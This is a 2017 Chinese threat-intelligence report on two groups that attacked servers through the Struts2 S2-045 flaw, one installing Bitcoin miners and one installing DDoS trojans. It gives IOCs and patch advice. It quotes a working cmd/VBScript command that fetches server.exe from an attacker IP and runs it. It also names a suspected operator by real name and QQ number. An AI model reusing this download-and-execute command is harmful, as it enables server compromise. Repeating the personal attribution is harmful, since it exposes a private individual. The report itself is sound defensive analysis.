西 方红 玫瑰 、辣条先生 -黑产 组织 深度 分析报告 烽火台威胁情报联盟 神州网云 冰狐实验室 天际友盟威胁情报实验室 2017 年 8 月 17 日 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 2 页 共 34 页 目 录 1. 报告摘要 . 3 2. 西方红玫瑰挖矿组织 . 4 2.1. IP 5.188.10.250 俄罗斯 &保加利亚的溯源分析 . 4 2.2. kworker样本分析 . 6 2.3. kworker_na样本分析 . 10 2.4. IP 5.188.10.104 的溯源分析 . 11 3. 辣条先生 DDoS 组织 . 13 3.1. IP 111.73.45.188的溯源分析 . 13 3.2. 下载者木马 server.exe样本分析 . 15 3.3. DDoS攻击样本分析 . 19 3.4. 辣条先生溯源分 析 . 29 4. 安全建议 . 32 5. 指示器 . 33 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 3 页 共 34 页 1. 报告 摘要 通过 神州 网云 部署在某节点 的 基 于 全 流量的 网镜高 级威胁检测系统 ,依靠自身 的 高 级 恶意检测引擎并结合订阅的 天 际友盟的 威胁情报来增强设备及数据中心 的 威胁 检测能力。 精确发现了多起 高 级 威胁组织的攻击，通过快速有效的 一键 溯 源确定了攻击行为及影响。 Struts2的安全漏洞从 2010年开始陆续被披露存在远程代码执行漏洞， 从 2 010年的 S2-005、 S2-009、 S2-013 S2-016、 S2-019、 S2-020、 S2-032、 S2-037、 devMode、及 2017 年 3 月初 Struts2 披露存在 S045 漏洞 ， 每一次的漏洞爆发 随 后互联网 都会 出现 Struts2扫描攻击 活动 。 依靠 网镜高级威胁检测系统 及威胁情报发现 并 确认了 两个威胁组织利用 Str uts2的安全漏洞攻击 行为 ，下载 并 执行不同的木马程序进行攻击获利。“西方红 玫瑰”利用一个位于欧洲的 ISP网络进行 Struts2攻击，主要针对 Linux平台来 下载执行比特币挖矿程序进行获利。“辣条先生” 至少拥有 5年左右的黑产活动 经历，利用中国江西电信网络长期进行各种威胁活动 。 本次活动 利用 Struts2漏 洞进行攻击，主要针对 Windows 平台 下载安装 DDoS 木马，并通过控制的大量服 务端来进行 DDoS 攻击。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 4 页 共 34 页 2. 西方红玫瑰 挖矿组织 通过某节点的网镜 高级威胁检测系统 自身的 检测能力结 合 威 胁 情报发现了 俄 罗斯 &保加利亚 (备 注： IP区域 地址库 多 个源不统一 )的一个 WestVPS运营商的 多个 IP 地址 Struts2-045 攻击 行为，结合与情报分析、样本分析判断为挖矿攻击 行为 。 根据该组织的特点我们命名次组织为 “ 西方红玫瑰 ” 组织。 该组织通过 Struts2-045漏洞批量对互联网的 WEB应用服务器发起攻击，并下载恶意脚本 执 行下载 进行 比特币 挖矿 程序 ，主要感染 Linux服务器 。 2.1. IP 5.188.10.250 俄 罗斯 &保加利亚 的溯源分析 通过 网镜 高级威胁检测系统 行为检测及情报匹配 检测到 多起恶意 IP 地址频 繁对某数据中心发起 Struts2-045攻击行 为 。 网镜高级威胁检测系统 检 测 到 Struts2-045攻击 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 5 页 共 34 页 针对攻击 IP地址 5.188.10.250 进行溯源分析 通过一键点击恶意 IP 进行溯源分析 发现此 IP 地址 为扫描器类型，且 IP 地 址 的信誉值较高，证明长期活跃还在对互联网进行恶意扫描活动。 Struts2-045攻击 原始数据包 分析 攻击数据包，发现 Struts2 漏洞 攻击的 命令利用 wget 下载一个文件 并 执行， 地址： 91.230.47.40/common/logo.jpg 下载下来 logo.jpg文件 是伪装成图片的 bash 脚本，内容如下： 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 6 页 共 34 页 对于 logo.jpg 脚本文件 分析如下： logo.jpg是在 linux环境下 执行 一系列命令 ，前面 ps一些命令强制杀掉一 些进程， ps -fe|grep echo $id2|grep -v grep-检查 eulyjbcfew 进程是否 存在， if $? -ne 0 -如果没有找到自己的木马进程，即不等于 0，则执行 下载 配置文件 kworker.conf。 根据 cpu 是否支持 aes加密指令集下载不同的木 马程序 ，即 if $? -ne 1 -并且不等于 1则下载 kworker文件 ，若不等于 0 也不不等于 1，则下载 kworker_na 文件为木马添加执行权限并执行 ，最后判断 有几个物理 CPU核 ，充分 利用受害者的 服务器 CPU资源 。 下载 的 文件列表 Kworker.conf 内容 2.2. kworker 样本分析 kworker样本信息 ： 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 7 页 共 34 页 属性 值 文件名 kworker MD5 354e6b99d4632c3a05301457f8ff0aaf SHA1 fd322ca3f0d9255c2a56233854d46d253595ea82 SHA256 138c648adf18d6e041420b62679956be605adef22bfbf1560a9e625560000cf1 文件大小 1.1 MB ( 1192720 bytes ) 文件类型 ELF 分析时间 2017-08-16 09:47:45 通过各类杀软的 结果 可以认定此样本为比特币挖矿客户端， 见 下图 ： 通过矿机的类型进行比对此类型应该属于第一种，利用 主机 CPU 资源 进行 挖矿，这从 样本的分析证实了此行为 。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 8 页 共 34 页 挖矿样本运行过程如下： 通过调用挖矿 客户端以 url（ json格式）作为参数 与矿池 通信 并 登记。当矿 池与 挖矿 客户端 连接以后， 挖矿 客户端 向矿池请求任务订阅，矿池给 挖矿 客户 端 返回任务。当 挖矿 客户端 找到 share 节点时，即可向 矿池 提交任务。 并且 发 现 样本有上传 受害者 服务器 信息 的嫌疑 。 详细分析： 1) 矿机采用 stratum 协议是目前最常用的矿机和矿池之间的 TCP 协议进 行通信 2) 矿机通过指定 url 与矿池连接。 3) 当矿机启动后首相向矿池订阅任务，然后矿池立即以 mining.notify 形式返回订阅号 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 9 页 共 34 页 4) 当矿机在矿池中登记后，矿池就会立即以 mining.notify 返回上述订 阅的任务。 5) 矿机登录：矿机登录前必须进行上述步骤的初始化连接否则矿机接不 到任务 . 根据 kworker.conf 的内容可以进行判定疑似矿池地址： 91.121.2.76:80 User=43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6 zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R Pass=” x” 6) 当矿机找到合法的 share后就会就会进行结果的提交 7) 上传用户信息 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 10 页 共 34 页 2.3. kworker_na 样本 分析 属性 值 MD5 db5d478bdd8c50ee4425c3b7aa7a0342 SHA1 0b4748680c8473f052a364b94669e05db790995d SHA256 d4ec78f0489509a7c8cc253d2d77e283e0f9b2abc657edac6c1595b3749a21ed 文件大小 2.1 MB ( 2173185 bytes ) 文件类型 ELF 分析时间 2017-08-03 21:35:39 通过各类杀软的 结果 可以认定此样本为比特币挖矿客户端，与 kworker样 本的结果一直， 见 下图 ： 通过对 恶意脚本文件中的 if-else的 内容 判断条件的分析。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 11 页 共 34 页 对 kworker_na 样本 分析，可以确定 kworker_na与 kworker 作用相同 ， 不同 点在于 Kworker_na 无符号调试信息，所示大小比 kworker 文件小。 2.4. IP 5.188.10.104 的溯源分析 通过 网镜高级威胁检测系统 利用相同的方法还发现在 5.188.10.x 网段 还有 一个 IP 地址 5.108.10.104 也在进行相同的攻击，同样利用 Struts2-045 漏洞 ， 执行相同的攻击命令，传播相同的挖矿样本。所以我们把这两个 IP 攻击归属为 一个组织。 网镜高级威胁检测系统 检测到 5.108.10.104同样进行 Struts2-045攻击 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 12 页 共 34 页 5.188.10.104 利用 Struts2-045漏洞攻击 数据包 从 攻击请求 的内容上看，跟 5.188.10.104 攻击行为没有什么区别，也是下 载一个 相同 URL 地址的 logo.jpg 文件，所以判断两个地址的攻击行为一致，且 是相同的组织所为。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 13 页 共 34 页 3. 辣条先生 DDoS 组织 通过某节点 神 州网云 网镜高级 威胁检测系统自身的检测能力 、 天 际 友盟威胁 情报能力发现了多个 IP 地址的 Struts2-045 行为，结合与情报分析、样本分析 判断为 DDoS 行为。根据该组织的 C2 通信域名 特点我们命名次组织为 “辣条 先 生” 组织。该组织通过 Struts2-045漏洞批量对互联网的 WEB应用服务器发起攻 击，并下载恶意脚本进行 DDoS木马植入 ，主要感染 Windows服务器 。 3.1. IP 111.73.45.188 的 溯源 分析 通过 网镜高级威胁检测系统 的 高 级恶意 行为检测及情报匹配检测到多起恶 意 IP地址频繁对某数据中心发起 Struts2-045攻击行为 。 网镜高级威胁检测系统 检测到 111.73.45.188 的 Struts2-045攻击 针对攻击 IP地址 111.73.45.188 进行溯源分析 通过一键点击恶意 IP进行溯源分析，发现此 IP地址 恶意行为包含扫描器及 恶意软件节点等多个威胁类型。且 IP 地址的信誉值较高，证明长期活跃还在对 互联网进行恶意 活动。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 14 页 共 34 页 Struts2-045攻击 原始数据包 执行的恶意命令代码如下： cmd=cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) hu.vbs&echo xPost.Open GET,111.73.45.188:52875/server.exe,0 hu.vbs&echo xPost.Send() hu.vbs&echo Set sGet = CreateObject(ADODB.Stream) hu.vbs&echo sGet.Mode = 3 hu.vbs&echo sGet.Type = 1 hu.vbs&echo sGet.Open() hu.vbs&echo sGet.Write(xPost.responseBody) hu.vbs&echo sGet.SaveToFile C:/server.exe,2 hu.vbs&cscript hu.vbs&del hu.vbs&start C:/server.exe) 通过 vbscript 代码 实现文件下载功能，主要是使用了 ADODB.Stream 来执行 如下行为：创建 vbs 下载者下载 -保存到 c 盘 ， 调用 cscript 运行 vbs 下载者 ， 然后 删除 自身 。网址 111.73.45.188:52875 打开以后，界面如下： 发现 Server.exe点击量达到了 735次 ，证明已经被下载安装了 735 次。 攻击者的木马文件列表 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 15 页 共 34 页 此下载者木马首先通过 server.exe 隐藏自身进程为 conime.exe，然后通过 指定连接下载 2022.exe、 3597.exe 及 7021.exe 三个 DdoS 攻击的 木马 服务端。 接下来 可以通过与 C2进行通信， 根据接收到的黑客命令进行拒绝式服务攻击。 3.2. 下载者木马 server.exe样本分析 属性 值 文件名 Server.exe MD5 d738afeb7a1d8bc65ce4726ed28c22b4 SHA1 885c030e33f291b8d6334fdeac0a8e9479a94148 SHA256 57e4e550cf08dc492d919c910f4992474e95728639126028746698c7d1deadfc 文件大小 13.5 KB ( 13824 bytes ) 文件类型 Win32 EXE 分析时间 2017-08-06 08:42:25 通过溯源平台关联 分析 利用威胁情报平台溯源能力对样本（ d738afeb7a1d8bc65ce4726ed28c22b4） 进行溯源分析，发行多家杀毒厂商认定样本为木马下载器，并且通过可视化的关 联出样本的恶意网络行为。 通过逆向分析木马下载者的 关键文件行为如下： 释放可执行文件： C:WINDOWSpjuezconime.exe 复制自身文件内容到： C:WINDOWSpjuezconime.exe 释放启动文件 conime.exe 退出自身进程 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 16 页 共 34 页 如果当前系统没有加载过 server.exe 则会先创建 server.exe 此进程。 此处通过进行 strcmpi（）函数进行比对当前加载的文件是否 conime.exe 。 如果当前调试文件不是： C:Windowspjuezconime.exe 则接下来在此路径 下的进行文件 创建。 通过 文件监控 观察 server.exe的进程树可知： Server.exe文件 创建进程加载自 身，之后 又创建新文件 conime.exe 进程（ C:W INDOWSpjuezconime.exe）。 最后进程 server.exe退出真正的木马下载 coni me.exe 运行。 真正的木马下载者 conime.exe 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 17 页 共 34 页 属性 值 文件名 Conime.exe MD5 19e9c14bdd3a26a7e7463d1837c6f0ba SHA1 b155e327189d2eebfd5a960763cd8b845e724b6f SHA256 3355a4acd0c05975374d28723cb3329b34eecc850df67d6f81823fe2f18026b5 文件大小 40.6 KB ( 41568 bytes ) 文件类型 Win32 EXE 分析时间 2017-08-08 16:24:57 通过溯源平台关联分析 利用威胁情报平台溯源能力对样本（ 19e9c14bdd3a26a7e7463d1837c6f0ba） 进行溯源分析，发行多家杀毒厂商认定样本为木马下载器，并且通过可视化的关 联出样本的恶意网络行为。 关键行为 分析 ： 1) 传递受害者 MAC地址 与（ 域名 IP地址 168.235.251.223）建立 网络连接传送主机 mac地址（存在唯一性）与时时进程数量。 目的是建立受害者 信息库，并执行后续的恶意操作。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 18 页 共 34 页 2) 尝试连接 111.73.45.188服务器 下载恶意程序 当与 111.73.45.188:52875 连接后 进行下载 baidu.gif 文件，之后再下载 2202.exe 3597.exe、 7012.exe恶意程序。 网络行为监控发现恶意程序的网络行为： 3) 保存下载恶意文件 HTTP 请求通过 InternetOpenurl()函数打开连接，利用函数 InternetReadF ile()写入本地 C:UsersHello_WorldAppDataLocalTemp 临时目录等待运 行调用。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 19 页 共 34 页 3.3. DDoS攻击 样本分析 1) 样本 2022.exe 属性 值 文件名 2022.exe MD5 ff5e1f27193ce51eec318714ef038bef SHA1 b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6 SHA256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320 文件大小 55.0 KB ( 56320 bytes ) 文件类型 Win32 EXE 分析时间 2017-02-14 15:32:11 2) 样本 2597.exe 属性 值 文件名 2597.exe MD5 f36b2847fd92acec57affdd044ee84cd SHA1 667775971398d96e1a0defca1551e2137483178e SHA256 1008bd90c13f0a4e1eebe819cc72a4eaaf2addddfc8329d94f2eeed8532430c8 文件大小 52.5 KB ( 53760 bytes ) 文件类型 Win32 EXE 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 20 页 共 34 页 分析时间 2017-08-09 05:49:12 3) 样本 7021.exe 属性 值 文件名 7921.exe MD5 e9ba3f25b5908faaf3c3dfb29c00e3df SHA1 c4a669b3f609d605fbbac035daecbafe47013d99 SHA256 02a7bf1a879891ad11ef3a1e4d8d477d1949087bcc834d5aa1dd5e3754995a57 文件大小 52.5 KB ( 53760 bytes ) 文件类型 Win32 EXE 分析时间 2017-08-10 10:33:06 通过对上述三个样本（ 2022.exe、 3597.exe、 7021.exe）分析认定三个样本 都是 DDoS 攻击木马，针对 Windows 平台 创建自动启动，获取操作系统信息上传 到 C2 服务器；并等待黑客组织的攻击指令对目标网站及服务器发起 DDoS 攻击。 拷贝自身文件到 C:WINDOWS目录并 更改名称为 taskhost.exe 来迷惑用户 复制操作 写入注册表实现 开机 自动 启动 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 21 页 共 34 页 创建互斥量 信息 并成设置 C2连接地址 比对操作系统版本信息，判断操作系统版本 获取系统语言 信息 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 22 页 共 34 页 获取 CPU信息 获取信息发送到 C2服务器 创建线程等待黑客指令进行攻击： 在查看样本资源节带有 PE文件，利用工具转出来后， MD5比较和样本释放在 C:Documents And SettingAdministratorLocal SettingsTemp路径释放的 多个名称为 XXXXXIE_FILE.exe 的 MFC文件一样。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 23 页 共 34 页 资源中隐藏有 PE文件 比对 MD5发现 临时文件夹 这两个文件 的 MD5地址 1c80d9201868e4b9c585d 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 24 页 共 34 页 b4eec4d0021是相同的。 设置 DDoS C2地址 将资源节中的 Bin 数据释放出来，创建 MFC 文件 来运行发起 DDoS 攻击。 创建 多个 mfc 格式文件后，等待接收黑客指令，发动攻击。 函数 sub_403624 跟进后 是与服务器域名为： latiaorj的进行 TCP连接。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 25 页 共 34 页 进行 TCPMutilConnect 攻击 进行 WebDownFileFlood2 攻击操作 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 26 页 共 34 页 进行 TCP sendData 攻击 进行 TcpConnect 攻击 下面是虚拟机运行 7012.exe后验证攻击的截图，多次发送大量 网络向 数据包， 且数据长度为 0。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 27 页 共 34 页 样本 3597.exe和 7012.exe代码结构是和 2022.exe一样 ， 且 样本行为一致， 只 是连接的服务器和自我复制后的名称不。 3579.exe 连接的域名为 lation wz 释放 nvvdsync.exe， 7012.exe 连接的域名是 qiangzairouji.f3322.or g，释放 quefhost.exe 如下图所示： 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 28 页 共 34 页 3579.exe 连接的域名 ： latiaowz:3597 3579释放的 exe文件名 7012.exe 连接的域名 ： qiangzhirouji.f3322:7012 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 29 页 共 34 页 7012释放的 exe文件名 3.4. 辣条先生溯源 分析 根据发现的 DDoS 的 C2 域名 latiaorj，通过 Whois 反查后发现以下信 息：邮箱： 联系人： caihongqiang，通过威胁情报平台溯源 发现确实与多个恶意程序有关联。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 30 页 共 34 页 根据获取的域名的注册邮件地址 通过对支付宝账号进行 验证，得知 真实 名字叫蔡洪强 。 结合在 server.exe 出现的域名： 怀疑出现 的 1123448049为 QQ号，搜索 QQ号发现 昵称为辣条 ： 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 31 页 共 34 页 利用 百度 搜索 QQ号得到信息，可以看到该作者 从 2013开始一直活跃在各大 黑客论坛，并一直 研究 木马 远控相关的技术 。由此可见 蔡洪强 利用江西 111.73. 45.188 服务器网络对互联网 Windows 平台 发起 Struts2-045 Web 攻击，并在受害 者对服务器种植 DDoS木马，利用控制的大量 DDoS服务端发起 DDoS攻击。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 32 页 共 34 页 4. 安全建议 互联网中充斥着大量的网络攻击行为，数据中心及内部网络中每天产生大量 的安全告警及威胁活动。可以依靠先进的 威胁检测系统 并结合威胁情报来进行精 确的威胁发现及防御威胁攻击。 针对 Struts2-045 的修复建议： 检测方式查看 web目录下 /WEB-INF/lib/目录下的 struts-core.x.x.jar ， 如果这个版本在 Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞，更新至 Strusts2.3.32或者 Strusts2.5.10.1，或使用第三方的防护设备进行防护。 临时解决方案： 删除 commons-fileupload-x.x.x.jar文件（会造成上传功能不可用）。 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 33 页 共 34 页 5. 指示器 事件中涉及的 ip 或者域名有： 111.73.45.188 168.235.251.223 148.81.111.121 A latiaorj(辣条肉鸡 ) latiaowz（辣条王子） qiangzairouji.f3322 (强仔肉鸡 ) 91.230.47.40 5.188.10.250 5.188.10.104 91.121.2.76 事件中涉及的木马样本 hash值有： 354e6b99d4632c3a05301457f8ff0aaf db5d478bdd8c50ee4425c3b7aa7a0342 d738afeb7a1d8bc65ce4726ed28c22b4 19e9c14bdd3a26a7e7463d1837c6f0ba ff5e1f27193ce51eec318714ef038bef f36b2847fd92acec57affdd044ee84cd e9ba3f25b5908faaf3c3dfb29c00e3df 西方红玫瑰 和辣条先生黑产组织 深度分析报告 第 34 页 共 34 页 6. 结语 全流量高级威胁检测 +威胁情报：集特征监测、行为分析、全流量深度分析、 取证、威胁情报、大数据分析等技术为一体的高级威胁检测与分析系统。可以在 更广的领域和范围进行网络信息安全事件的事前警示、事中发现、事后溯源。 还 原的相关网络行为及报警线索 自动 留存 6 个月以上 ， 为 分析人员提供安全事件的 全方位大纵深态势感知、分析定性与电子取证能力。